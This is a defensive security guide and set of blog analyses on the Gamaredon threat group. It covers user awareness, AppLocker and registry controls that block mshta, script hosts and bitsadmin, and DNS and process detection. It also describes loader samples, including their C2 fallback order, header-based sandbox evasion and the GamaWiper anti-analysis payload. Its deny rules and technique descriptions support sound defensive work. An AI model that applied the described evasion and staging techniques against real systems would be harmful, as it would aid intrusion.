An email attachment that appears harmless is can be nothing more than a delivery mechanism for script execution. Shortcuts, script files or archive formats are are instructions, not documents.

For this reason, email attachments should never be opened impulsively. Files originating from unknown senders, unexpected conversations or unclear contexts must always be routed through a defined analysis workflow. This may include automated malware scanning, sandbox execution or escalation to a SOC or security team for manual review.

Treating attachments as executable content rather than documents removes a core assumption attackers rely on: that a single double-click is enough to gain a foothold.

2. “It looks normal” is not a defense

A common assumption in phishing awareness is that malicious emails will “look suspicious.” Misspelled text, strange formatting or obviously fake senders are warning signs. Campaigns operated by Gamaredon routinely break this expectation.

Many of the emails used in these operations are short, plain and unremarkable. They may not contain any obvious red flags, no unusual wording and no visual elements that stand out. In some cases, the message itself is barely relevant at all. The attachment is the real payload.

Relying on visual cues or intuition to assess whether an email is safe is therefore considered to be ineffective. A file does not need to look dangerous to be dangerous. Shortcuts, script files and archived attachments can appear entirely legitimate while silently triggering code execution in the background.

This is intentional. Gamaredon does not attempt to impress the recipient or convince them emotionally. Instead, it blends into routine communication, where opening an attachment feels like a harmless, almost automatic action.

For this reason, the absence of suspicious indicators are better off never be treated as confirmation of safety. Normal looking emails are not evidence of harmless content, they are often the environment in which these campaigns are most successful.

3. Why double-clicking is dangerous

Most people treat double-clicking as a harmless, almost meaningless action. It is how you open a document, check an image,or quickly look at a file someone sent you. From a usability perspective, that makes sense. From a security perspective, it is exactly the problem.

Not every file is a document! Many files are nothing more than instructions telling Windows to execute other programs, run scripts or fetch additional content from the internet. When you double-click those, you are not “previewing” anything. You are actively starting a process chain.

What makes this especially effective is how unspectacular it looks. In many Gamaredon cases the initial file does almost nothing visible. Maybe a window flashes, sometimes nothing happens at all. From the users point of view, that feels like a failed or broken attachment. From the attackers POV the important part already happened: code execution in user context.

This is not accidental. Gamaredon does not need the first file to be powerful. It only needs it to run. The rest can be downloaded, replaced or updated later. The initial step is small, quiet and easy to overlook.

That is why “just opening it to see what it is” is not a safe strategy. With many attachment types, execution is the first and only action. There is no confirmation dialog, no warning and no visible sign that anything meaningful happened until much later, when the real payload is already in place.

tldr: double-clicking is not a neutral action. It is a trust decision and attackers like Gamaredon build their entire delivery chain around the assumption that this trust will be given automatically. Gamaredon can be avoided if you stop trusting the files you are about to open .
As Lenin said “доверяй, но проверяй” 😉

4. Update. Update. Update.

Always keep the software on your system up to date. Gamaredon has actively exploited real-world vulnerabilities, for example a WinRAR vulnerability “CVE-2025-6218” observed in campaigns since late 2025.

This vulnerability allows an attacker to place a malicious file into the Windows startup folder when an archive is opened or extracted. The user may only see a normal archive being unpacked, while persistence is already being established in the background and the system becomes infected after the next reboot. This is exactly the kind of low-effort, high-impact technique that fits Gamaredons operational model.

Keeping your software updated, especially tools that handle downloaded files such as archive managers, removes entire classes of attack techniques.

5. When to escalate

One of the most reliable defenses attackers have is silence.
Not because nothing happened, but because users assume that whatever happened is probably not important enough to bother anyone with.

“This file didn’t open properly”
“The window flashed and disappeared”
“Nothing seems broken so it’s probably fine”

From the perspective of an attacker, this is perfect. Initial access does not necessarily need to be loud, it only needs to be unnoticed.

The first-stage file doesn’t display an error message, ransomware screen or any obvious sign of compromise. It executes, exits and waits for the next step. If no one reports it, there is nothing to investigate, nothing to contain and nothing to learn from.

Users hesitate to report something because they do not want to be wrong, do not want to interrupt anyone or assume that security teams only care once things are clearly broken. Unfortunately, by the time something is clearly broken, the attacker has already achieved most of their objectives.

From a defensive POV the ideal time to escalate is when you are unsure whether something must have happened at all and not when you are sure something malicious happened.

If an attachment behaves strangely or if a file does not open as expected, if a website triggers download you did not request or if anything simply feels off, that is already enough reason to report it. Security teams do not need certainty. They need signals.
It’s better to report one more false positives to your security team then not reporting it.

Yes, most reports will turn out to be harmless. That is fine. What is not fine is missing the few cases that actually matter because no one wanted to be the person who raised a false alarm.

tldr: if something looks broken, weird or pointless, that is not a reason to ignore it. That is exactly when escalation is supposed to happen. The worst possible outcome of reporting is a short investigation. The worst possible outcome of not reporting is an attacker quietly staying in your network.


Defensive Controls for System and Network Administrators

1. Kill the script layer

Gamaredons operations depend almost entirely on script-based execution. VBScript, JS, HTA files and shortcut-based loaders are the foundational tools. Without the ability to execute scripts in user context, the majority of observed Gamaredon infection chains fail before any payload is delivered.

This makes the script execution layer a highly effective choke point for defenders.

In many environments, script interpreters such as wscript.exe, cscript.exeor mshta.exe are still broadly available to all users, despite having little to no legitimate business use. From an attackers perspective, this provides a reliable and low-friction execution environment that does not require exploits, elevated privileges or complex tooling.

Restricting or disabling these components significantly raises the cost of an attack. Blocking mshta.exe entirely, enforcing execution policies for VBScript and JScript and preventing script execution from user-writable locations such as Downloads, Tempor profile directories removes a critical assumption Gamaredon relies on: that scripts will execute by default.

Where complete blocking is not feasible, strict allow-listing needs to be applied. Script execution should be limited to known, signed,and explicitly required use cases. Everything else should fail closed.

It is important to note that this is not merely a prevention measure, but also a detection opportunity. Script-based attacks are very noisy at the process level. Parent-child relationships such as email clients spawning script hosts or shortcut files launching interpreters provide strong, behavior based signals that are far more stable than file hashes or domains.

Defenders mostly focus on detecting the final payload. Against Gamaredon, this approach is too late. By the time a second stage binary is downloaded, the attacker has already achieved their primary goal: execution. Eliminating or tightly controlling the script layer prevents this first and most critical step.


Option 1: Disable mshta.exe

mshta.exe has virtually no legitimate use in modern enterprise environments and is heavily abused by Gamaredon

Applocker

Path Rule: Deny

%SystemRoot%\System32\mshta.exe
%SystemRoot%\SysWOW64\mshta.exe

Action: Deny

User: Everyone

>> Click Create new Rule

>> Click Continue

>> Click Continue

>> Select Path; Click Continue

Filename: %SystemRoot%\System32\mshta.exe

>> Click Create

>> Click Yes

If you had no rules before, it will look like this:

Software Restriction Policies

Legacy but effective

  1. Open gpedit.msc
  2. Computer Configuration
    > Windows Settings
    > Security Settings
    > Software Restriction Policies
  3. Create New Path Rule
  4. Path C:\Windows\System32\mshta.exe
  5. Security Level: Disallowed

Repeat for SysWOW64


Option 2: VBS and JS Restriction

Disable Windows Script Host (WSH), this disables wscript.exe and cscript.exe

Registry (GPO-friendly)
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings]
"Enabled"=dword:00000000

if you want to re-enable

"Enabled"=dword:00000001

This alone stops most VBS- and JS-based Gamaredon loaders.
It’s also a good defense against other Threat Actors, since Gamaredon is not the only one to use the methods

You can also do this per user btw:

[HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings]
"Enabled"=dword:00000000


Option 3: Block Script Exec from User-Writable Paths

Gamaredon relies on execution from:

  • Downloads
  • %TEMP%
  • %APPDATA%
  • Email attachment paths

Apply to:

  • .vbs
  • .js
  • .hta
  • .lnk

Prevents double-click execution even if scripts are not fully disabled


Option 4: If Blocking is impossible – Make It Visible

Some environments cannot fully disable scripts. In that case, visibility is mandatory.

Enable Script Block Logging:

Computer Configuration
> Administrative Templates
  > Windows Components
    > Windows PowerShell

Enable:

  • Turn on Script Block Logging
  • Turn on Module Logging

Enable Command Line Proccess Auditing

Computer Configuration
> Administrative Templates
  > System
    > Audit Process Creation

Enable:

  • Include command line in process creation events

This enables:

  • Event ID 4688
  • Parent/Child relationships:
    • outlook.exe > wscript.exe
    • explorer.exe > mshta.exe


Option 5: YARA on Email Attachments

One of the most effective defensive layer that is underestimated in Gamaredon-style campaigns is attachment scanning at the email gateway using YARA rules.

A large part of Gamaredons initial access relies on script-based loaders delivered directly as attachments (HTA, VBS, JS, LNK) most of the time inside archives (abusing Winrar CVE since end of 2025), scanning files before they ever reach the user can break the infection chain at the earliest possible stage.

YARA is particularly useful here because it does not rely on file hashes or exact filenames. Structural patterns, script constructs and typical obfuscation techniques tend to remain relatively stable even when the surrounding delivery changes. That makes YARA a good fit for detecting families of loaders rather than individual samples.

Applied at the mail gateway or in attachment processing pipelines, YARA rules can prevent execution entirely instead of trying to detect activity after the user already clicked the file. From a defensive POV, that is always the better place to intervene.

I maintain a set of YARA rules specifically focused on Gamaredon loader patterns, including HTA- and VBScript-based stages observed from older and recent campaigns. These rules are meant for legitimate research and defensive use. If you are working in a security or incident response context and want to test or deploy them, feel free to contact me and I can provide them for evaluation and tuning.

YARA will not stop infrastructure shifts or payload changes, but it is very effective at removing large parts of the delivery layer that Gamaredon depends on. Combined with script execution controls and network visibility (read above), it significantly reduces the attackers room to operate.


Option 6: Shortcut (LNK) Abuse Mitigation

Gamaredon frequently abuses .lnk files as script launchers.

Controls:
  • Block .lnk execution from email attachment paths
  • Alert on:
    • LNK spawning wscript, mshta, powershell
  • Disable preview handlers for LNK in mail clients if possible

Option 7: Block / Restrict bitsadmin

This should be an addition, not just an option
As a fallback for msxmlhttp, Gamaredon introduced bitsadmin in their newest Gamaload Samples as an additional fallback, you can read more about it here.

Disabling BITS entirely is not an option in most enterprise environments.
Windows Update, Defender, SCCM and many enterprise management tools depend on it.
Breaking BITS usually means breaking business.

The goal is therefore not to kill BITS, but to remove its value as a reliable malware loader.

Gamaredon doesn’t need stealthy tooling. They need something that works everywhere, survives bad networks and doesn’t get blocked. If you take away that reliability, the technique quickly becomes unattractive.

Below are several practical controls that achieve exactly that:

Block bitsadmin.exe, not BITS

bitsadmin.exe is merely a legacy command-line frontend for BITS.
Modern software uses PowerShell or native APIs instead. In most environments, nothing legitimate depends on interactive use of bitsadmin.exe.

Control

Block the binary using AppLocker or WDAC:

%SystemRoot%\System32\bitsadmin.exe
%SystemRoot%\SysWOW64\bitsadmin.exe

Scope: non-admin or Everyone, depending on your policy

Impact

  • Windows Update continues to work
  • Defender continues to work
  • SCCM and management tooling remain unaffected
  • But… Malware loses the easiest way to create BITS jobs

Why this hurts Gamaredon

Gamaredons loaders frequently invoke BITS directly from scripts and HTA stages.
They rely on simple CLI execution, not on robust API-based fallbacks. Blocking the binary often breaks the entire staging chain

Restrict Where BITS Is Allowed to Connect

BITS traffic is still regular HTTP/HTTPS traffic.
It can and should be controlled at the network layer!

Control

On proxy or firewall level:

  • Allow BITS traffic only to:
    • Microsoft update endpoints
    • Internal patching infrastructure
    • Explicitly approved business domains
  • Block or inspect everything else.

Optional detection:

  • Alert on User-Agent: Microsoft BITS/* connecting to non-whitelisted domains.

Impact

  • Business traffic remains unaffected
  • Updates continue to function
  • External drop servers used by attackers fail reliably!

This is a strong IOC-less control that scales well in enterprise environments 🙂

Disrupt BITS Job Persistence

One of BITS advantages for attackers is job persistence:
jobs survive logoffs, reboots and network interruptions.

Removing that persistence dramatically reduces reliability for staged malware delivery.

Control

Regularly purge queued jobs:

PowerShell example:

Get-BitsTransfer -AllUsers | Remove-BitsTransfer

Schedule this on workstations every 30–60 minutes (adjust to your needs)

Impact

  • Normal short-lived update jobs typically complete unaffected
  • Malware loses reliable staging and retry capability

Use caution during large enterprise software rollouts, this is also not the most effective way imo

Enforce Strong Telemetry on BITS Usage

As I already mentioned, if you cannot block it safely everywhere, make abuse visible!

Control

  • Enable command-line process auditing
  • Monitor:
    • Execution of bitsadmin.exe
    • Parent processes such as mshta.exe, wscript.exe
  • Correlate with network destinations and file writes

Impact

  • No production risk
  • High-quality detection signal
  • Low false-positive rate

Remember: BITS usage initiated from scripting engines is rarely legitimate

Behavioral Heuristics for BITS Abuse

For mature environments and advanced detection platforms:

Monitor for suspicious patterns such as:

  • BITS downloads into:
    • %TEMP%
    • %APPDATA%
    • User profile writable paths
  • Randomized file names
  • Short-lived jobs followed immediately by execution
  • Non-corporate TLS destinations

This can be implemented via:

  • ETW telemetry
  • Defender Advanced Hunting
  • Custom sensors and collectors

Provides behavioral detection without relying on static indicators


Visibility beats prevention

At minimum, you need to have visibility into:

  • wscript.exe (classic VBS/JS execution)
  • cscript.exe (same, console version)
  • mshta.exe (HTA execution, including embedded VBScript/JS)
  • powershell.exe (still relevant, second stage)

But execution alone is only half of the picture here.
In Gamaredon campaigns script hosts are usually paired with built-in Windows networking components, MSXMLHTTP.

Inside the script, outbound communication is handled via this compnents (mostly):

  • MSXML2.XMLHTTP
  • MSXML2.ServerXMLHTTP

From the outside, this generally looks like a normal process making web requests. There is no external downloader, no suspicious binary and no obvious command line indicator, since everything happens inside the script host process itself.

That means defenders should not only care that a script host started, but also whether that process immediately initiated network connections. Script execution without network activity might be a test or a failure. Script execution followed by HTTP traffic is the actual attack.

If your telemetry cannot correlate:

  • script execution
  • with outbound connections
  • and with the destination domain or IP

then you are missing the exact phase where Gamaredon (or other Threat Actors) transitions from initial access to payload delivery.

tldr; seeing the script start is useful. Seeing the script talking to the internet is what actually tells you that the infection chain is active

Alert on Parent-Child Process Chains, Not on Filenames

Gamaredon changes filenames constantly. That is not where stability is.

What does not change:

  • Email client -> script host
  • Explorer -> shortcut -> script host
  • Script host -> network activity

Those relationships are far more reliable than any hash or URL

If your detection logic is still focused on “known bad files”, you are solving yesterdays problem. Behavior survives infrastructure rotation … but IOCs do not

Treat Failed Infections as Intelligence, Not as Non-Events

One of the more frustrating patterns when tracking Gamaredon is how many times infection attempts partially fail. The loader runs, the payload is blocked or the network request never completes.

From an incident-response POV it could be treated as “problem solved”.

From an intelligence perspective, i think that it’s a gift.

Those events tell you:

  • Which attachment types are used
  • Which execution paths are attempted
  • Which infrastructure is currently active

If you only investigate successful infections, you will always be late. The campaigns that fail today are the ones that succeed tomorrow with minor adjustments. If you understand Gamaredon properly, you can always be a step ahead.

Accept That Something Will Slip Through – Just Plan Around That

Perfect prevention is a nice idea, but ideas are just ideas. It is not how real environments work.

Gamaredon does not need persistence for months. It needs minutes of execution. If those minutes go unnoticed, the damage is already done, regardless of whether the payload later gets removed.

Your defensive strategy needs to assume:

  • Some scripts will execute
  • Some attachments will be opened
  • Some rules will be bypassed

The question here is whether anyone notices in time to react.

Visibility does not replace prevention at all. But without visibility, prevention failures become silent compromises. And silent compromises are exactly what this actor benefits from. You could say that visibility complement your prevention efforts.


Network controls that matter

From a network POV, Gamaredon is not noisy. It does not deploy custom backdoors that beacon every few seconds and it does not rely on exotic protocols. Most of the traffic is simple http(s) generated directly from scripts using tools like MSXML2.XMLHTTP.

That has two important consequences for defenders.

First, there is no separate downloader process to catch.
The same process that executed the script is now making web requests. Just mshta.exe or wscript.exe talking to the internet like a perfectly normal Windows application.

Second, many network controls are designed around detecting known bad destinations, not suspicious clients. If you only look at where traffic goes, but not who is sending it and under which circumstances, you miss the entire initial delivery phase.

For Gamaredon style campaigns network defense has to focus on context, NOT just destination.

Correlate Network Traffic With Process Activity

If a script host executes and immediately initiates outbound connections, that is not normal workstation behavior.

At minimum, be able to answer:

  • Which process opened the connection?
  • What launched that process?
  • What file triggered the execution?

MSXMLHTTP-based traffic will look perfectly legitimate on the wire unless you know it came from a script that just executed from a mail attachment.

Normalize Outbound HTTP Behavior

One of the more uncomfortable lessons when tracking Gamaredon is that attackers actively use network behavior itself as a detection mechanism.

In several waves, delivery depended on whether certain headers, (in the latest Gamaload Samples) especially Content-Length, matched what the script originally set. Many commercial proxy setups modify requests by:

  • re-encoding bodies
  • switching between chunked and fixed-length transfers
  • inspecting and rewriting traffic

From the attackers side, that becomes a cheap and reliable way to identify analysis environments and block payload delivery.

Defensively, this means:

  • Outbound traffic needs to be as predictable and uniform as possible
  • Proxy behavior should be consistent across user and analysis environments
  • Sudden header manipulation should be considered a detection signal, not just a networking detail!!!

Otherwise, you end up with the worst possible situation:
real users get infected, while analysis systems receive fake or destructive payloads


DNS as a detection surface

Treat DynDNS and Low-Rep Domains as High-Risk by Default

Gamaredon infrastructure heavily relies on:

  • dynamic DNS providers
  • rapidly changing subdomains
  • short-lived hosting setups

Blocking individual domains is pointless. They rotate too fast. What does not change is the type of infrastructure being used.

From a defensive standpoint, this means:

  • DynDNS traffic has to be restricted, monitored or at least flagged
  • Newly registered domains should not be treated the same as established ones
  • DNS telemetry is worth as part of detection logic, not just resolution

If your network policy implicitly trusts any domain that resolves, you are trusting exactly the layer Gamaredon is built on

What to Monitor Instead of Chasing Domains

DNS telemetry provides several signals that remain useful even when infrastructure rotates:

  • Domain age
    Newly registered domains should be treated different from domains that have existed for years. Many Gamaredon delivery endpoints fall into the “new/very new” category.
  • Provider patterns
    Certain DynDNS and free subdomain services appear repeatedly across campaigns.
  • Subdomain churn
    Rapidly changing subdomains under the same parent domain are a common pattern. This is not normal behavior for most legitimate services used by end users.
  • NXDOMAIN spikes
    Failed dns lookups shortly before successful connections can indicate scripted discovery or fallback logic inside loaders.
    Since this is very common, you can use this as a strong pattern for finding Gamaredon related activity.
    You can detect it, even if timeouts and sleeps are enabled.

None of these signals alone prove malicious intent itself, but together they describe infrastructure behavior that is/could be highly consistent with how Gamaredon operates.
Once this dynamic is understood, the operational flexibility that makes Gamaredon effective becomes a liability that defenders can exploit 🙂

Restriction Beats Blacklisting

If possible, access to high-risk DNS categories have to be restricted by policy, not just monitored.

This can include:

  • blocking or limiting known DynDNS providers
  • forcing additional inspection or logging for low-reputation domains
  • isolating traffic to newly registered domains

The goal is not to eliminate all risk (that is unrealistic) but to reduce the attackers ability to operate entirely in disposable infrastructure without triggering any response.

Gamaredon depends on infrastructure that can be replaced quickly and cheaply. Defensive strategies have to make that approach operationally expensive instead of operationally invisible.

DNS Is Not Just Plumbing

In many environments, DNS is treated as a purely technical service: something that resolves names and moves on. From a threat detection perspective, that is a wasted opportunity.

DNS shows:

  • where systems are trying to go
  • how often endpoints change
  • whether communication targets look stable or disposable

Especially in script-driven infection chains, DNS can be the first external signal that something has moved from local execution to external communication.

If DNS data is not included in your detection logic, then a large portion of Gamaredon activity will look like harmless background traffic until much later in the attack chain.

In my opinion, proper DNS logging should always be included a defensive strategy, regardless of which threat actor you are dealing with.


Prepare for anti-analysis

One thing that becomes obvious to me when tracking Gamaredon over time is that they do not just try to avoid detection, they actively react to analysis.

Payload delivery and script behavior can change depending on the environment. Analysis systems may receive different payloads, broken samples or nothing at all, while real victims get fully functional stages. What you see in a sandbox is not always what happens in the wild.

This means relying on a single analysis setup is risky. If all samples run through the same sandbox, the same proxy and the same network profile, that environment becomes easy to fingerprint and easy to avoid.

Analysis systems should look as boring and realistic as possible.

The takeaway from my analysis is simple: when the attacker adapts to being observed, your analysis pipeline becomes part the attack surface. If you do not account for that, you may be analyzing exactly what the attacker wants you to see


More information

If you want to know more about Gamaredn, check out my latest articles:

Gamaredon: Same Goal, Fewer Fingerprints


by Robin Dost

In malware analysis, it is tempting to describe change as innovation.
New tricks, new tooling, new malware families.
What is far more revealing, however, is how little actually changes and what changes anyway.

Between late November and the end of December 2025, several Gamaredon-related VBScript loaders surfaced that are, functionally, almost identical. They all execute the same mechanism, rely on the same execution primitive, and ultimately aim for the same outcome.

And yet, something does change, quietly, incrementally, and very deliberately.

This article focuses strictly on observable, concrete shifts in obfuscation, not assumptions, not intent inferred from tooling, and not architectural leaps that are not supported by the samples themselves.

For this analysis, I used the following samples:

Date of SampleHashDownload
19.12.20256de9f436ba393744a3966b35ea2254dde2f84f5b796c6f7bee4b67ccf96ccf0aDownload
22.12.20259218528a40a48a3c96df3b49a7498f6ea2a961f43249081b17880709f73392c1Download
25.12.20252c69fd052bfaa03cd0e956af0f638f82bc53f23ee8d0c273e688e257dac8c550Download
30.12.2025846748912aa6e86b9d11f6779af6aae26b7258f8610d5e28eff0083779737824Download


25 November 2025 – Noise Without Structure

The earliest sample is dominated by volume.

Characteristics:

  • Hundreds of variables that are written to once and never read again
  • Repeated arithmetic mutations (x = x + 14) without semantic relevance
  • Long linear execution flow
  • No variable declarations (Dim entirely absent)

The obfuscation here serves one purpose only: syntactic noise.

There is no attempt to:

  • Hide control flow
  • Delay string resolution
  • Reconstruct logic conditionally

Everything is present in the source, just buried under irrelevant assignments.

From an analyst’s perspective, this sample is noisy but predictable.
Once dead code is ignored, execution logic collapses into a short, linear sequence.


19 December 2025 – Indicator overload

The mid-December sample introduces a clear and measurable change: indicator density.

New observations:

  • A significant increase in hard-coded URLs
  • URLs pointing to unrelated, legitimate, and state-adjacent domains
  • No execution dependency on most of these URLs

Crucially, these URLs are not obfuscated. They are placed in plain sight.

This is not string hiding it is indicator flooding.

The obfuscation shift here is not technical complexity, but analytical friction:

  • Automated extraction produces dozens of false leads
  • IOC-based clustering becomes unreliable
  • Manual triage cost increases without changing execution logic

The loader still behaves linearly. What changes is the signal-to-noise ratio.


22 December 2025 – Defensive Reaction at the Payload Layer

The December 22 sample is not an obfuscation milestone, but it is a defensive one.

From a loader perspective, almost nothing changes:

  • The download URL is fully present and statically recoverable
  • No additional string hiding or control-flow manipulation is introduced
  • Execution remains linear and transparent

However, focusing solely on loader complexity misses the actual shift.

The real change happens at the payload layer

For the first time in this series, the loader delivers GamaWiper instead of Pterodo for Analysis environments.

This is not a neutral substitution.

As outlined in my earlier analysis of GamaWipers behavior, this payload is explicitly designed to:

In other words:
Gamaredon reacts defensively, just not in the loader yet.

Why obfuscation does not increase here

The absence of additional loader obfuscation is not a contradiction, but a signal.

At this stage:

  • The defensive burden is shifted entirely onto the payload
  • The loader acts as a transparent delivery mechanism
  • Analysis deterrence is achieved through destructive behavior, not concealment

This suggests a deliberate sequencing:

  1. Introduce a hostile payload to counter analysis
  2. Observe detection and response
  3. Only then begin hardening the delivery mechanism itself

Why this sample matters

~ December 22 marks the point where Gamaredon stops merely being observed and starts actively responding.

Not by hiding better, but by ensuring that seeing the payload has consequences.

The subsequent increase in loader obfuscation after this date does not replace this strategy.
It complements it.

Payload hostility first.
Delivery hardening second.

Notably, this change occurs almost exactly four weeks after my article outlining practical approaches to tracking Gamaredon infrastructure went public.
Whether coincidence or feedback loop, the timing aligns remarkably well with the first observed deployment of GamaWiper as an anti-analysis response.


25 December 2025 – Control-Flow Noise Appears

The Christmas sample does not introduce new primitives, but it does introduce execution ambiguity.

Concrete changes:

  • Multiple .Run invocations exist
  • Not all of them result in meaningful execution
  • Several objects and variables are constructed but never used
  • Execution order is less visually obvious

This is not branching logic, but control-flow camouflage.

The analyst can still reconstruct execution, but:

  • Dead paths look plausible
  • Execution sinks are no longer unique
  • Automated heuristics struggle to identify the real one

The obfuscation no longer targets strings, it targets execution clarity.


30 December 2025 – Fragmented Runtime Assembly

The final sample introduces the most tangible structural changes.

Observed differences:

  • Systematic use of Dim declarations
  • Extensive use of short, non-semantic string fragments
  • Assembly of execution-relevant strings via repeated concatenation across distant code sections
  • No complete execution string exists statically
  • Domains are just random invalid Domains

At no point does the full execution command exist as a contiguous value in the source.

Instead:

  • Fragments are combined
  • Recombined
  • Passed through intermediate variables
  • Finalized immediately before execution

This directly degrades:

  • Static string extraction
  • Signature-based detection
  • Regex-driven tooling

No encryption is added.
The shift is purely architectural.


05 January 2026 – Added Datetime Parameter to URL

EDIT 07.01.2026: I added this part as new findings appeared

Since early January, another small but relevant change appeared in the loader logic.

The scripts now generate a date value at runtime:

This value is then embedded directly into the download path, resulting in URLs like:

.../UkrNet_02.01.2026/cutting/02.01.2026/hannah8342.pdf

From a detection standpoint, this is subtle but effective

This means:

  • payload paths change daily
  • static URL signatures age out immediately
  • and IOC reuse across campaigns becomes unreliable

Relation to Prior Observations

This behavior aligns closely with patterns discussed in my earlier article on GamaWiper and Gamaredon’s anti-analysis strategies, where delivery behavior adapts based on perceived execution context.

https://blog.synapticsystems.de/gamawiper-explained-gamaredon-anti-analysis/


What Actually Changed and What Did Not

What did not change:

  • Execution primitive
  • Loader purpose
  • Overall delivery mechanism

What did change:

  • When execution-relevant strings become complete
  • How many false execution paths exist
  • How much irrelevant context surrounds the real logic

This is not a rewrite.
It is iterative hardening.


Conclusion

These samples do not demonstrate innovation.
They demonstrate attention.

Each iteration removes one assumption analysts rely on:

  • “The string will exist somewhere”
  • “The execution path is obvious”
  • “Dead code looks dead”

Gamaredon did not add complexity for its own sake.
They added just enough friction to slow analysis and then stopped.

And that restraint is, in itself, the most telling signal.

GamaWiper Explained: Gamaredon’s “New” Anti-Analysis Weapon


by Robin Dost

After my recent blog posts covering Gamaredon’s ongoing PterodoGraph campaign targeting Ukraine, and following almost a full month of silence in terms of newly observed malware samples, fresh activity has finally resurfaced.

New samples have appeared, along with reports pointing to a component now referred to as GamaWiper.

It is important to note that GamaWiper, or at least very similar scripts has already been observed in Gamaredon operations in previous months.
From a purely technical standpoint, this functionality is therefore not entirely new.

What is new, however, is the context in which it is now being deployed.

In this article, I aim to shed some light on what GamaWiper actually is, why Gamaredon is actively delivering it at this stage of the infection chain, and what this shift tells us about the group’s current operational mindset.
What initially appears to be just another destructive payload instead turns out to be a deliberate control mechanism, one that decides who receives the real malware and who gets wiped instead

I’ll keep this post a bit shorter and focus only on what’s new, so it doesnt get boring.
If you’re looking for deeper technical details, please refer to my previous posts from 22.11.2025 and 13.11.2025, where I covered the core mechanics in depth.

For this analysis, I’m using my deobfuscated version of the sample, next time i’ll maybe show you how to deobfuscate Gamaredon Scripts manually in less then 10 minutes.

After downloading the latest Gamaredon malware sample, it immediately became obvious that the current variants differ noticeably from what we’ve seen before.

SHA256: 6de9f436ba393744a3966b35ea2254dde2f84f5b796c6f7bee4b67ccf96ccf0a

Note: I started writing YARA Rules for Gamaredons current samples, you can find them here.


Key Changes at a Glance

  • Junk URLs now closely resemble real payload delivery URLs
  • No full Pterodo payload is delivered anymore 🙁
  • Gamaredon has hardened the delivery of Pterodo samples

Infection Flow – What Changed?

After the user opens the RAR archive and infects their system, the behavior initially looks familiar.
On reboot, the Pterodo sample is fetched again, but only if the client is geolocated in Ukraine, as already mentioned in my previous blog posts.

Previously, non-UA clients would simply receive:

  • an empty page, or
  • an empty file

Today, however, things look a bit different.

Instead, the client receives GamaWiper.


GamaWiper – Sandbox? Gone.

GamaWiper is essentially a sandbox / VM killer whose sole purpose is to prevent analysis environments from seeing anything useful.

In earlier campaigns, this wasn’t always handled very well.
For example, when I used Hybrid-Analysis, it was trivial to extract:

  • Telegram channels
  • Graph URLs
  • infrastructure relationships

This was a classic infrastructure design flaw and a great example of what budget cuts can do to an APT operation 😄

Today, however, the approach is much simpler:

If a sandbox is detected -> wipe it

No telemetry, no infrastructure leaks, no fun.

If you are a doing legit malware research interested in (deobfuscated) Samples from Gamaredon, you can write me an email.


Initial Loader: “GamaLoad”

The initial loader, which I’ll refer to as GamaLoad, implements a multi-stage payload fetch mechanism with dynamically constructed URLs and headers.
The goal is resilience: fetch stage two no matter what.

Note: All malicious domains have been removed.


Request Characteristics

Request Type

  • Method: GET
  • Client: msxml2.xmlhttp
  • Execution: synchronous

URL Structure

Each request fetches a randomly generated resource:

/<random>.<ext>
  • Random filename: 7-10 characters (a-z, 0-9)
  • Camouflage extensions, e.g.:
    • wmv
    • yuv
    • lgc
    • rm
    • jpeg

C2 Fallback Order

The script iterates through multiple sources until a valid payload is received:

  1. Argument URL (if passed at execution)
  2. Hardcoded fallback
  3. Cloudflare Workers domain
  4. Domain fetch using @ notation
  5. Abuse of the URL userinfo field
  6. Dynamic host via check-host.net
    • HTML parsing
    • live host extraction
  7. Alternative domain (again using @ notation)
  8. Registry-based URL

Once a working C2 is found, it is stored as a persistent C2 entry.


HTTP Headers

The request uses very explicit and intentionally crafted headers.

User-Agent

A browser-like string combined with a host fingerprint, including:

  • Computer name
  • Drive serial number (hex-encoded)
  • Timestamp
    • UTC+2
    • Ukrainian local time expected

Cookie

  • Static campaign identifier
  • Rotates regularly (more on that below)

Content-Length

  • Explicitly set
  • Even for GET requests

Enables victim identification & tracking
Also plays a role in proxy evasion (see below)


Success Condition

A request is considered successful when:

  • HTTP status is 200
  • Response size is greater than 91 bytes

Once this condition is met, all remaining fallbacks are skipped.


Payload Processing

  1. Payload received as binary
  2. UTF-8 conversion
  3. Cleanup (CR/LF, delimiters)
  4. Base64 decoding
  5. In-memory execution

No disk writes – classic fileless execution


Evasion Techniques

  • Multi-stage fallback logic
  • Dynamic hosts
  • Delays between requests
  • Victim-specific User-Agent

Below is an example of a fully constructed request header sent to the payload delivery host.


Payload Rotation

Gamaredon currently rotates payloads every 1-3 hours.

With each rotation, the following variables may change:

  • Domains for Payload Delivery
  • User-Agent
  • Cookie
  • Content-Length

Why Is Content-Length Set?

The Content-Length HTTP header specifies the size of the request or response body in bytes.
Its typical purpose is:

  • Defining message boundaries
  • Preventing truncated reads
  • Enabling correct stream handling

In this case, however, I strongly believe the header is set intentionally for tracking and proxy evasion.

Why?

The loader uses msxml2.xmlhttp.
When calling .send() via this client, the Content-Length header is not overwritten.

For a normal residential client, this is usually not an issue.
However, many HTTP/HTTPS proxies, especially residential and chained proxies fail to handle this properly and may:

  • break the connection
  • modify the request
  • normalize headers

This behavior is highly detectable.

My conclusion:
Gamaredon likely uses this mechanism to filter out proxy-based analysis setups.
The choice of client and header behavior is far too specific to be accidental.

So, if you end up receiving GamaWiper instead of a payload, now you know why.


Conclusion

Gamaredon has clearly tightened its operational security.

The infrastructure flaws that previously allowed easy extraction of internal details have been addressed, and sandbox detection has shifted from “leaky but useful” to “wipe and move on”.

While these changes will certainly disrupt some tracking and automated analysis systems, the overall approach feels… let’s say pragmatic, but somewhat heavy-handed.

Effective?
Yes.

Elegant?
Debatable 😄


QuasarRAT Malware Campaign using CVE-2025-6218


I am currently analyzing the recent surge of malware samples exploiting the WinRAR vulnerability CVE-2025-6218. During this research, I found a new sample on abuse.ch which appears to be part of a small QuasarRAT malware campaign.

What is CVE-2025-6218? (Short summary for this analysis)

This vulnerability enables:

  • Remote Code Execution (RCE)
  • Manipulated NTFS Alternate Data Streams (ADS)
  • Hidden paths / directory traversal / tampered extraction metadata

The exploit relies on:

  • Specially crafted file headers
  • Unexpected or malformed filename fields in the RAR block
  • ADS payloads such as file.txt:evil.exe embedded inside the RAR structure
  • WinRAR linking the ADS → extracting it → and executing the resulting file automatically

The SHA256 hash of the file is:

c67cc833d079aa60d662e2d5005b64340bb32f3b2f7d26e901ac0b1b33492f2f
You can download the file here.

